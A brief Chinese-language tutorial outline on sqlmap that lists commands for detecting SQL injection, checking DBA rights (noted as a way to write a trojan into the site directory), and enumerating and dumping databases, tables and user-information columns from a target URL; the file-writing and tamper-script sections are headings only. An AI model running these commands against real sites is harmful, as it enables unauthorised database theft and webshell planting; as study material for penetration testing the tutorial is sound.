sqlmap的使用方法
sqlmap基础用法
语法参数
参数
描述
实例
注入流程
sqlmap -u 目标网址 (检测是否存在sql注入,如果存在并返回目标网址的数据库)
sqlmap -u 目标网址 --is-dba (检测是否存在dba权限,dba权限是可以把文件写到目录里面去,如果存在就可以把木马写到目录里)
sqlmap -u 目标网址 --dbs (把目标网址所有的数据库列出来)
sqlmap -u 目标网址 --current-db (查找当前数据库)
sqlmap -u 目标网址 --tables -D “数据库名” (查询数据库的所有表名,之后根据经验自己猜一下那个是含有用户信息的表名)
sqlmap -u 目标网址 --columns -T “数据库表名” -D “数据库名” (查询所有的字段名)
sqlmap -u 目标网址 --dump -D “数据库名” -T “数据库表名” -C “数据库字段名” (对目标用户信息进行暴力破解)文件写入和读取


Tamper脚本编写
1.了解tamper脚本的结构
2.使用实例
最后更新于